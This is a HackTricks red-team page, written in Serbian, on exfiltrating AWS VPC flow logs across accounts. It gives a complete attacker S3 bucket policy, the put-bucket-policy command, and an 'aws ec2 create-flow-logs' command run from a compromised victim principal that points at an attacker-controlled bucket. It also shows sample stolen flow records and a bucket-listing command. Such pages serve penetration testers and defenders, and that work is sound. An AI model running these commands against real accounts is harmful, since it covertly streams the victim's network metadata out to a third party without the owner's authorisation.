AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Sažetak

Zloupotrebite ec2:CreateFlowLogs da izvezete VPC, subnet, ili ENI flow logs direktno u napadačev S3 bucket. Kada je delivery role konfigurisana da piše u eksterni bucket, svaka konekcija koja se vidi na nadgledanom resursu se strimuje iz naloga žrtve.

Zahtevi

  • Principal žrtve: ec2:CreateFlowLogs, ec2:DescribeFlowLogs, i iam:PassRole (ako je delivery role potreban/kreiran).
  • Napadačev bucket: S3 politika koja veruje delivery.logs.amazonaws.com i dodeljuje s3:PutObject i bucket-owner-full-control.
  • Opcionalno: logs:DescribeLogGroups ako se izvozi u CloudWatch umesto u S3 (nije potrebno ovde).

Koraci napada

  1. Attacker priprema S3 bucket politiku (u nalogu napadača) koja dozvoljava VPC Flow Logs delivery servisu da upisuje objekte. Zamenite placeholder-e pre primene:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowVPCFlowLogsDelivery",
"Effect": "Allow",
"Principal": { "Service": "delivery.logs.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
"Condition": {
"StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
}
}
]
}

Primeni sa naloga napadača:

aws s3api put-bucket-policy \
--bucket <attacker-bucket> \
--policy file://flowlogs-policy.json
  1. Victim (compromised principal) kreira flow logs koji su usmereni ka attacker bucket:
REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>
ROLE_ARN=<delivery-role-with-logs-permissions>   # Must allow delivery.logs.amazonaws.com to assume it
aws ec2 create-flow-logs \
--resource-type VPC \
--resource-ids "$VPC_ID" \
--traffic-type ALL \
--log-destination-type s3 \
--log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
--deliver-logs-permission-arn "$ROLE_ARN" \
--region "$REGION"

U roku od nekoliko minuta, flow log files se pojavljuju u attacker bucket i sadrže konekcije za sve ENIs u nadgledanom VPC/subnet.

Dokazi

Primer flow log records zapisanih u attacker bucket:

version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK

Dokaz listanja Bucket-a:

aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize

Uticaj

  • Kontinuirana exfiltration mrežnih metapodataka (IP adrese izvora/destinacije, portovi, protokoli) za nadgledani VPC/subnet/ENI.
  • Omogućava analizu saobraćaja, identifikaciju osetljivih servisa i potencijalno hunting za security group misconfigurations izvan kompromitovanog naloga.

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks